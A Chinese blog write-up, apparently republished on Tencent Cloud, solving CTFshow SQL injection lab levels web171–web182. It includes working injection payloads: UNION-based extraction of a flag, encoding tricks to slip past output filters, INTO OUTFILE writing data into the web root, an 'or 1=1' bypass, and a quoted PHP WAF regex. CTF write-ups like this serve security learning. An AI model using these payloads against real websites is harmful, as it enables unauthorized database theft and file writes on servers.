CTFshow之web入门SQL注入

十二惊惶

发布于 2024-02-28 20:29:14

1530

发布于 2024-02-28 20:29:14

文章被收录于专栏：十二惊惶的网络安全研究记录十二惊惶的网络安全研究记录

web171

使用sqlmap是没有灵魂的，我尽量手注，

在这一道题我们可以看见一共是24个，同时查询的是ID，我们猜测id实际上不止24个，但直接是无法查询到更多数据，推测是

select username,password from user where username !='flag' and id = ".$_GET['id'];

我们可以构造9999’ or id=’26在前一句命令没有执行的情况下，去强行跳转执行，得到flag。

web172

TIP: 撸猫为主，要什么flag?

这道题SQL语句与上一道一样,但是多了限制条件

//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

9999' union select id,password from ctfshow_user2 where username = 'flag

web173

真就是花式吊打,上一道题的构造直接可以使用因为flag是出现在username中的，我们可以在使用联合查询的时候直接不去查username，查询两次id，因为两个都是id的话会有问题，定义一个别名就行。

9999' union select id as '12',id,password from ctfshow_user3 where username = 'flag

也可以对username进行编码

9999' union select id,hex(username),password from ctfshow_user3 where username = 'flag

web174

在返回逻辑中过滤掉了数字

0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23

得到的flag一一替换便可以得到真正的flag

Web175

0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+

web176

好吧直接万能注入就行了，看别的博客上说是过滤了select……构造： 1’or 1=1– -

Web177

这一个题目，这个过滤了空格….. 1’and’1’=’1

Web178

似乎是多过滤了什么，又似乎是什么都没有过滤。

web182

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

给出了后端过滤的内容，过滤了into，select，flag等，这样就不能进行联合注入了。

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2022-05-06，如有侵权请联系 cloudcommunity@tencent.com 删除

replace

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度